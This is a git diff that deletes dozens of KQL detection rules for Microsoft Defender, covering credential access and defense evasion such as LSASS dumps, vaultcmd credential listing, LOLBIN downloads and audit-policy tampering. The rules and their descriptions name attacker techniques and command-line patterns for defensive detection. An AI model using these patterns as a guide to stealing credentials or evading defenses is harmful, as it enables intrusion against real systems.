@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/06/27
-// Level: high
-// Description: Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials
-// Tags: attack.credential_access, attack.t1003.001
-DeviceFileEvents
-| where InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\WerFault.exe" and (FolderPath contains "\\lsass" or FolderPath contains "lsass.exe")
\ No newline at end of file
diff --git a/Credential Access/Windows_Credential_Editor_Registry.kql b/Credential Access/Windows_Credential_Editor_Registry.kql
deleted file mode 100644
index df152890..00000000
--- a/Credential Access/Windows_Credential_Editor_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/12/31
-// Level: critical
-// Description: Detects the use of Windows Credential Editor (WCE)
-// Tags: attack.credential_access, attack.t1003.001, attack.s0005
-DeviceRegistryEvents
-| where RegistryKey contains "Services\\WCESERVICE\\Start"
\ No newline at end of file
diff --git a/Credential Access/Windows_Credential_Manager_Access_via_VaultCmd.kql b/Credential Access/Windows_Credential_Manager_Access_via_VaultCmd.kql
deleted file mode 100644
index 823b25cd..00000000
--- a/Credential Access/Windows_Credential_Manager_Access_via_VaultCmd.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/08
-// Level: medium
-// Description: List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe
-// Tags: attack.credential_access, attack.t1555.004
-DeviceProcessEvents
-| where ProcessCommandLine contains "/listcreds:" and (FolderPath endswith "\\VaultCmd.exe" or ProcessVersionInfoOriginalFileName =~ "VAULTCMD.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/ADS_Zone.Identifier_Deleted_By_Uncommon_Application.kql b/Defense Evasion/ADS_Zone.Identifier_Deleted_By_Uncommon_Application.kql
deleted file mode 100644
index 5c77ac85..00000000
--- a/Defense Evasion/ADS_Zone.Identifier_Deleted_By_Uncommon_Application.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/09/04
-// Level: medium
-// Description: Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
-// Tags: attack.defense_evasion, attack.t1070.004
-DeviceFileEvents
-| where FolderPath endswith ":Zone.Identifier" and (not((InitiatingProcessFolderPath in~ ("C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\SysWOW64\\explorer.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe")))))
\ No newline at end of file
diff --git a/Defense Evasion/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql b/Defense Evasion/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql
deleted file mode 100644
index 857eb759..00000000
--- a/Defense Evasion/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/17
-// Level: high
-// Description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "DCLCWPDTSD")
\ No newline at end of file
diff --git a/Defense Evasion/Abusing_Print_Executable.kql b/Defense Evasion/Abusing_Print_Executable.kql
deleted file mode 100644
index a62f50b9..00000000
--- a/Defense Evasion/Abusing_Print_Executable.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative
-// Date: 2020/10/05
-// Level: medium
-// Description: Attackers can use print.exe for remote file copy
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "/D" and ProcessCommandLine contains ".exe") and ProcessCommandLine startswith "print" and FolderPath endswith "\\print.exe") and (not(ProcessCommandLine contains "print.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Access_To_Windows_Outlook_Mail_Files_By_Uncommon_Application.kql b/Defense Evasion/Access_To_Windows_Outlook_Mail_Files_By_Uncommon_Application.kql
deleted file mode 100644
index 3969c5ac..00000000
--- a/Defense Evasion/Access_To_Windows_Outlook_Mail_Files_By_Uncommon_Application.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2024/05/10
-// Level: low
-// Description: Detects file access requests to Windows Outlook Mail by uncommon processes.
-Could indicate potential attempt of credential stealing.
-Requires heavy baselining before usage
-
-// Tags: attack.t1070.008, attack.defense_evasion
-DeviceFileEvents
-| where (FileName contains "\\AppData\\Local\\Comms\\Unistore\\data" or FileName endswith "\\AppData\\Local\\Comms\\UnistoreDB\\store.vol") and (not(((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\" and (InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe")) or (InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Activate_Suppression_of_Windows_Security_Center_Notifications.kql b/Defense Evasion/Activate_Suppression_of_Windows_Security_Center_Notifications.kql
deleted file mode 100644
index 6a5eaf90..00000000
--- a/Defense Evasion/Activate_Suppression_of_Windows_Security_Center_Notifications.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/19
-// Level: medium
-// Description: Detect set Notification_Suppress to 1 to disable the Windows security center notification
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\UX Configuration\\Notification_Suppress"
\ No newline at end of file
diff --git a/Defense Evasion/Add_DisallowRun_Execution_to_Registry.kql b/Defense Evasion/Add_DisallowRun_Execution_to_Registry.kql
deleted file mode 100644
index 9a560793..00000000
--- a/Defense Evasion/Add_DisallowRun_Execution_to_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/19
-// Level: medium
-// Description: Detect set DisallowRun to 1 to prevent user running specific computer program
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun"
\ No newline at end of file
diff --git a/Defense Evasion/Add_Insecure_Download_Source_To_Winget.kql b/Defense Evasion/Add_Insecure_Download_Source_To_Winget.kql
deleted file mode 100644
index 65afca78..00000000
--- a/Defense Evasion/Add_Insecure_Download_Source_To_Winget.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects usage of winget to add a new insecure (http) download source.
-Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add " and ProcessCommandLine contains "http://") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Add_New_Download_Source_To_Winget.kql b/Defense Evasion/Add_New_Download_Source_To_Winget.kql
deleted file mode 100644
index cc0181f1..00000000
--- a/Defense Evasion/Add_New_Download_Source_To_Winget.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: medium
-// Description: Detects usage of winget to add new additional download sources
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql b/Defense Evasion/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql
deleted file mode 100644
index 2fc70f43..00000000
--- a/Defense Evasion/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: medium
-// Description: Detects usage of winget to add new potentially suspicious download sources
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and ProcessCommandLine matches regex "://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}"
\ No newline at end of file
diff --git a/Defense Evasion/Add_SafeBoot_Keys_Via_Reg_Utility.kql b/Defense Evasion/Add_SafeBoot_Keys_Via_Reg_Utility.kql
deleted file mode 100644
index 350c9856..00000000
--- a/Defense Evasion/Add_SafeBoot_Keys_Via_Reg_Utility.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/02
-// Level: high
-// Description: Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " copy " or ProcessCommandLine contains " add ") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot"
\ No newline at end of file
diff --git a/Defense Evasion/AddinUtil.EXE_Execution_From_Uncommon_Directory.kql b/Defense Evasion/AddinUtil.EXE_Execution_From_Uncommon_Directory.kql
deleted file mode 100644
index e61ed7f2..00000000
--- a/Defense Evasion/AddinUtil.EXE_Execution_From_Uncommon_Directory.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
-// Date: 2023/09/18
-// Level: medium
-// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (FolderPath endswith "\\addinutil.exe" or ProcessVersionInfoOriginalFileName =~ "AddInUtil.exe") and (not((FolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath contains ":\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Defense Evasion/AgentExecutor_PowerShell_Execution.kql b/Defense Evasion/AgentExecutor_PowerShell_Execution.kql
deleted file mode 100644
index 01323d08..00000000
--- a/Defense Evasion/AgentExecutor_PowerShell_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards
-// Date: 2022/12/24
-// Level: medium
-// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -powershell" or ProcessCommandLine contains " -remediationScript") and (FolderPath =~ "\\AgentExecutor.exe" or ProcessVersionInfoOriginalFileName =~ "AgentExecutor.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Allow_RDP_Remote_Assistance_Feature.kql b/Defense Evasion/Allow_RDP_Remote_Assistance_Feature.kql
deleted file mode 100644
index 7d763754..00000000
--- a/Defense Evasion/Allow_RDP_Remote_Assistance_Feature.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/19
-// Level: medium
-// Description: Detect enable rdp feature to allow specific user to rdp connect on the targeted machine
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "System\\CurrentControlSet\\Control\\Terminal Server\\fAllowToGetHelp"
\ No newline at end of file
diff --git a/Defense Evasion/Amsi.DLL_Loaded_Via_LOLBIN_Process.kql b/Defense Evasion/Amsi.DLL_Loaded_Via_LOLBIN_Process.kql
deleted file mode 100644
index 3528b66c..00000000
--- a/Defense Evasion/Amsi.DLL_Loaded_Via_LOLBIN_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/01
-// Level: medium
-// Description: Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack
-// Tags: attack.defense_evasion
-DeviceImageLoadEvents
-| where FolderPath endswith "\\amsi.dll" and (InitiatingProcessFolderPath endswith "\\ExtExport.exe" or InitiatingProcessFolderPath endswith "\\odbcconf.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Application_Whitelisting_Bypass_via_Dxcap.exe.kql b/Defense Evasion/Application_Whitelisting_Bypass_via_Dxcap.exe.kql
deleted file mode 100644
index d8a1500d..00000000
--- a/Defense Evasion/Application_Whitelisting_Bypass_via_Dxcap.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/26
-// Level: medium
-// Description: Detects execution of of Dxcap.exe
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains " -c " and (FolderPath endswith "\\DXCap.exe" or ProcessVersionInfoOriginalFileName =~ "DXCap.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_Command_Execution_Using_WSL.kql b/Defense Evasion/Arbitrary_Command_Execution_Using_WSL.kql
deleted file mode 100644
index caf25951..00000000
--- a/Defense Evasion/Arbitrary_Command_Execution_Using_WSL.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/10/05
-// Level: medium
-// Description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary Linux or Windows commands
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " --exec" or ProcessCommandLine contains " --system" or ProcessCommandLine contains " --shell-type " or ProcessCommandLine contains " /mnt/c" or ProcessCommandLine contains " --user root" or ProcessCommandLine contains " -u root" or ProcessCommandLine contains "--debug-shell") and (FolderPath endswith "\\wsl.exe" or ProcessVersionInfoOriginalFileName =~ "wsl.exe")) and (not(((ProcessCommandLine contains " -d " and ProcessCommandLine contains " -e kill ") and InitiatingProcessFolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_DLL_or_Csproj_Code_Execution_Via_Dotnet.EXE.kql b/Defense Evasion/Arbitrary_DLL_or_Csproj_Code_Execution_Via_Dotnet.EXE.kql
deleted file mode 100644
index fb086580..00000000
--- a/Defense Evasion/Arbitrary_DLL_or_Csproj_Code_Execution_Via_Dotnet.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community
-// Date: 2020/10/18
-// Level: medium
-// Description: Detects execution of arbitrary DLLs or unsigned code via a ".csproj" files via Dotnet.EXE.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine endswith ".csproj" or ProcessCommandLine endswith ".csproj\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".csproj'" or ProcessCommandLine endswith ".dll'") and (FolderPath endswith "\\dotnet.exe" or ProcessVersionInfoOriginalFileName =~ ".NET Host")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql
deleted file mode 100644
index 124d7a9b..00000000
--- a/Defense Evasion/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/11/09
-// Level: high
-// Description: Detects usage of "IMEWDBLD.exe" to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\IMEWDBLD.exe" or ProcessVersionInfoOriginalFileName =~ "imewdbld.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql
deleted file mode 100644
index f28e5897..00000000
--- a/Defense Evasion/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/11/09
-// Level: medium
-// Description: Detects usage of "msedge_proxy.exe" to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\msedge_proxy.exe" or ProcessVersionInfoOriginalFileName =~ "msedge_proxy.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql
deleted file mode 100644
index 03309431..00000000
--- a/Defense Evasion/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects usage of "MSOHTMED" to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSOHTMED.exe" or ProcessVersionInfoOriginalFileName =~ "MsoHtmEd.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_File_Download_Via_MSPUB.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_MSPUB.EXE.kql
deleted file mode 100644
index 6f5fc727..00000000
--- a/Defense Evasion/Arbitrary_File_Download_Via_MSPUB.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSPUB.exe" or ProcessVersionInfoOriginalFileName =~ "MSPUB.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_File_Download_Via_PresentationHost.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_PresentationHost.EXE.kql
deleted file mode 100644
index 3f3dd72d..00000000
--- a/Defense Evasion/Arbitrary_File_Download_Via_PresentationHost.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_File_Download_Via_Squirrel.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_Squirrel.EXE.kql
deleted file mode 100644
index b4580a08..00000000
--- a/Defense Evasion/Arbitrary_File_Download_Via_Squirrel.EXE.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
-// Date: 2022/06/09
-// Level: medium
-// Description: Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " --download " or ProcessCommandLine contains " --update " or ProcessCommandLine contains " --updateRollback=") and ProcessCommandLine contains "http" and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_MSI_Download_Via_Devinit.EXE.kql b/Defense Evasion/Arbitrary_MSI_Download_Via_Devinit.EXE.kql
deleted file mode 100644
index 8441648d..00000000
--- a/Defense Evasion/Arbitrary_MSI_Download_Via_Devinit.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/11
-// Level: medium
-// Description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
-// Tags: attack.execution, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains " -t msi-install " and ProcessCommandLine contains " -i http"
\ No newline at end of file
diff --git a/Defense Evasion/AspNetCompiler_Execution.kql b/Defense Evasion/AspNetCompiler_Execution.kql
deleted file mode 100644
index 52dbd8ef..00000000
--- a/Defense Evasion/AspNetCompiler_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/11/24
-// Level: medium
-// Description: Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code.
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where (FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework64\\") and FolderPath endswith "\\aspnet_compiler.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Assembly_Loading_Via_CL_LoadAssembly.ps1.kql b/Defense Evasion/Assembly_Loading_Via_CL_LoadAssembly.ps1.kql
deleted file mode 100644
index ec22dd8d..00000000
--- a/Defense Evasion/Assembly_Loading_Via_CL_LoadAssembly.ps1.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/05/21
-// Level: medium
-// Description: Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls.
-// Tags: attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where ProcessCommandLine contains "LoadAssemblyFromPath " or ProcessCommandLine contains "LoadAssemblyFromNS "
\ No newline at end of file
diff --git a/Defense Evasion/Atbroker_Registry_Change.kql b/Defense Evasion/Atbroker_Registry_Change.kql
deleted file mode 100644
index 465dcede..00000000
--- a/Defense Evasion/Atbroker_Registry_Change.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Mateusz Wydra, oscd.community
-// Date: 2020/10/13
-// Level: medium
-// Description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'
-// Tags: attack.defense_evasion, attack.t1218, attack.persistence, attack.t1547
-DeviceRegistryEvents
-| where (RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs" or RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") and (not(((RegistryValueData =~ "(Empty)" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\atbroker.exe" and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs"))))
\ No newline at end of file
diff --git a/Defense Evasion/Audit_Policy_Tampering_Via_Auditpol.kql b/Defense Evasion/Audit_Policy_Tampering_Via_Auditpol.kql
deleted file mode 100644
index 833d5e8a..00000000
--- a/Defense Evasion/Audit_Policy_Tampering_Via_Auditpol.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Janantha Marasinghe (https://github.com/blueteam0ps)
-// Date: 2021/02/02
-// Level: high
-// Description: Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.
-This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
-
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "disable" or ProcessCommandLine contains "clear" or ProcessCommandLine contains "remove" or ProcessCommandLine contains "restore") and (FolderPath endswith "\\auditpol.exe" or ProcessVersionInfoOriginalFileName =~ "AUDITPOL.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Audit_Policy_Tampering_Via_NT_Resource_Kit_Auditpol.kql b/Defense Evasion/Audit_Policy_Tampering_Via_NT_Resource_Kit_Auditpol.kql
deleted file mode 100644
index ee26e9fb..00000000
--- a/Defense Evasion/Audit_Policy_Tampering_Via_NT_Resource_Kit_Auditpol.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/18
-// Level: high
-// Description: Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.
-This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
-
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "/logon:none" or ProcessCommandLine contains "/system:none" or ProcessCommandLine contains "/sam:none" or ProcessCommandLine contains "/privilege:none" or ProcessCommandLine contains "/object:none" or ProcessCommandLine contains "/process:none" or ProcessCommandLine contains "/policy:none"
\ No newline at end of file
diff --git a/Defense Evasion/Bad_Opsec_Defaults_Sacrificial_Processes_With_Improper_Arguments.kql b/Defense Evasion/Bad_Opsec_Defaults_Sacrificial_Processes_With_Improper_Arguments.kql
deleted file mode 100644
index d58c690b..00000000
--- a/Defense Evasion/Bad_Opsec_Defaults_Sacrificial_Processes_With_Improper_Arguments.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)
-// Date: 2020/10/23
-// Level: high
-// Description: Detects attackers using tooling with bad opsec defaults.
-E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.
-One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.
-
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where ((ProcessCommandLine endswith "regasm.exe" and FolderPath endswith "\\regasm.exe") or (ProcessCommandLine endswith "regsvcs.exe" and FolderPath endswith "\\regsvcs.exe") or (ProcessCommandLine endswith "regsvr32.exe" and FolderPath endswith "\\regsvr32.exe") or (ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe") or (ProcessCommandLine endswith "WerFault.exe" and FolderPath endswith "\\WerFault.exe")) and (not((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{"))) and (not((ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessCommandLine contains "--uninstall --channel=stable" and (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Google\\Chrome\\Application\\") and InitiatingProcessFolderPath endswith "\\Installer\\setup.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Base64_Encoded_PowerShell_Command_Detected.kql b/Defense Evasion/Base64_Encoded_PowerShell_Command_Detected.kql
deleted file mode 100644
index 91362173..00000000
